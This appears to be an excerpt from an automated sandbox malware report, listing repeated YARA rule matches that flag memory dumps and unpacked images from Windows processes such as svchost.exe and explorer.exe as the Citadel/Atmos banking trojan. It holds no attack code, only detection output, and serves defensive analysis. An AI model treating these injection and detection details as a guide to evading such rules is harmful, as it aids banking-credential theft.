                        Source: 20.0.WinStore.App.exe.a10000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 20.0.WinStore.App.exe.a10000.0.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 1.3.nyheukpo.exe.40fb2d4.5.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 6.3.explorer.exe.c350000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 6.3.explorer.exe.c350000.0.raw.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 30.0.XRdxSzSUL8yOL.exe.2990000.1.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 30.0.XRdxSzSUL8yOL.exe.2990000.1.raw.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 5.0.ctfmon.exe.a50000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 5.0.ctfmon.exe.a50000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 5.0.ctfmon.exe.a50000.0.raw.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 4.3.svchost.exe.9a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 4.3.svchost.exe.9a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 4.3.svchost.exe.9a0000.0.raw.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 23.3.UserOOBEBroker.exe.10000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 23.3.UserOOBEBroker.exe.10000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 23.3.UserOOBEBroker.exe.10000.0.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 7.0.svchost.exe.d40000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 7.0.svchost.exe.d40000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 7.0.svchost.exe.d40000.0.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 6.0.explorer.exe.c350000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 6.0.explorer.exe.c350000.0.raw.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 40.2.XRdxSzSUL8yOL.exe.2390000.1.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 40.2.XRdxSzSUL8yOL.exe.2390000.1.raw.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 29.3.RuntimeBroker.exe.ee0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 29.3.RuntimeBroker.exe.ee0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 29.3.RuntimeBroker.exe.ee0000.0.raw.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 26.3.conhost.exe.30000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 26.3.conhost.exe.30000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 26.3.conhost.exe.30000.0.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 40.2.XRdxSzSUL8yOL.exe.2390000.1.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 40.2.XRdxSzSUL8yOL.exe.2390000.1.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 20.3.WinStore.App.exe.a10000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 20.3.WinStore.App.exe.a10000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 20.3.WinStore.App.exe.a10000.0.raw.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 39.2.XRdxSzSUL8yOL.exe.2b30000.1.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 39.2.XRdxSzSUL8yOL.exe.2b30000.1.raw.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 7.3.svchost.exe.d40000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 7.3.svchost.exe.d40000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 7.3.svchost.exe.d40000.0.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 33.2.XRdxSzSUL8yOL.exe.2e50000.1.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 33.2.XRdxSzSUL8yOL.exe.2e50000.1.raw.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 4.3.svchost.exe.9a0000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 4.3.svchost.exe.9a0000.0.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 4.3.svchost.exe.9a0000.0.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 19.3.ApplicationFrameHost.exe.180000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 19.3.ApplicationFrameHost.exe.180000.0.raw.unpack, type: UNPACKEDPEMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 19.3.ApplicationFrameHost.exe.180000.0.raw.unpack, type: UNPACKEDPEMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 00000008.00000003.1784947759.0000000000B50000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 00000008.00000003.1784947759.0000000000B50000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 00000008.00000003.1784947759.0000000000B50000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 0000001E.00000000.2102061957.0000000002990000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 0000001E.00000000.2102061957.0000000002990000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 00000029.00000002.2973195709.0000000002C90000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 00000029.00000002.2973195709.0000000002C90000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 00000003.00000003.1733775300.0000000000910000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 00000003.00000003.1733775300.0000000000910000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 00000003.00000003.1733775300.0000000000910000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 00000007.00000000.1762934350.0000000000D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 00000007.00000000.1762934350.0000000000D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 00000007.00000000.1762934350.0000000000D40000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 00000012.00000000.1997415854.0000000000900000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 00000012.00000000.1997415854.0000000000900000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 00000012.00000000.1997415854.0000000000900000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 00000014.00000000.2023199442.0000000000A10000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 00000014.00000000.2023199442.0000000000A10000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 00000014.00000000.2023199442.0000000000A10000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 00000013.00000000.2000681241.0000000000180000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 00000013.00000000.2000681241.0000000000180000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 00000013.00000000.2000681241.0000000000180000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 00000001.00000003.2766629012.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 00000001.00000003.2766629012.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 00000001.00000003.2579296491.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 00000001.00000003.2579296491.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 00000016.00000003.2066202032.0000000000F10000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 00000016.00000003.2066202032.0000000000F10000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 00000016.00000003.2066202032.0000000000F10000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 0000001F.00000000.2106925891.0000000002E30000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 0000001F.00000000.2106925891.0000000002E30000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 00000001.00000002.2922936744.0000000000401000.00000020.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 00000001.00000002.2922936744.0000000000401000.00000020.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 00000000.00000003.1693418014.0000000002590000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 00000025.00000000.2123634235.0000000000C90000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 00000025.00000000.2123634235.0000000000C90000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 00000025.00000000.2123634235.0000000000C90000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 00000000.00000003.1699808293.00000000021C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 00000019.00000003.2081273338.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 00000019.00000003.2081273338.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 00000019.00000003.2081273338.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 00000006.00000003.1762790225.000000000C350000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 00000006.00000003.1762790225.000000000C350000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 00000001.00000003.2282267263.00000000040FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 00000000.00000002.2171781778.0000000002B50000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 00000005.00000000.1737083449.0000000000A50000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 00000005.00000000.1737083449.0000000000A50000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 00000005.00000000.1737083449.0000000000A50000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 00000001.00000000.1699967711.0000000000401000.00000020.00000001.01000000.00000006.sdmp, type: MEMORYMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 00000013.00000003.2022956144.0000000000180000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 00000013.00000003.2022956144.0000000000180000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 00000013.00000003.2022956144.0000000000180000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 00000020.00000000.2109775705.0000000002530000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 00000020.00000000.2109775705.0000000002530000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 0000000F.00000000.1955460926.0000000000290000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 0000000F.00000000.1955460926.0000000000290000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 0000000F.00000000.1955460926.0000000000290000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: citadel13xy date = 2013-01-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Citadel 1.5.x.y trojan banker, version = 1.0
                        Source: 0000000F.00000003.1965679095.0000000000290000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Atmos_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Generic Spyware.Citadel.Atmos Signature, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
                        Source: 0000000F.00000003.1965679095.0000000000290000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Atmos_Packed_Malware date = 20/08/2016, author = xylitol@temari.fr, description = Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer, reference = http://www.xylibox.com/2016/02/citadel-0011-atmos.html
